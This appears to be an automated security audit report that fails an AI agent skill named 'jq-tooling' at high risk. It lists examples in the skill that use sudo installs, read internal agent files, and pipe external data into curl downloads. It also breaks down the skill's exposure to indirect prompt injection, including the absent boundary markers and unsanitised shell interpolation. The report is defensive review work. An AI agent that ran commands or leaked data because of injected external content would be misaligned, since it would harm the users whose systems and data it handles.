jq-tooling
Fail
Audited by Gen Agent Trust Hub on Mar 10, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous shell command examples and specifically includes instructions for system-level package installation using 'sudo apt-get install jq', which requires elevated privileges.
- [DATA_EXFILTRATION]: Documentation examples demonstrate reading from sensitive internal agent paths like '~/.agents/.skill-lock.json', potentially exposing private metadata about the agent's environment and installed skills.
- [EXTERNAL_DOWNLOADS]: The skill demonstrates fetching data from external APIs via 'curl', including endpoints at api.github.com and generic placeholders.
- [REMOTE_CODE_EXECUTION]: An example demonstrates piping data from jq into 'xargs curl -O', allowing the agent to programmatically download arbitrary files from the internet based on processed content.
- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection. 1. Ingestion points: Data from external APIs (SKILL.md). 2. Boundary markers: Absent. 3. Capability inventory: Subprocess execution via bash and network operations via curl (SKILL.md). 4. Sanitization: Absent; the skill demonstrates direct interpolation of external data into shell commands.
Recommendations
- AI detected serious security threats
Audit Metadata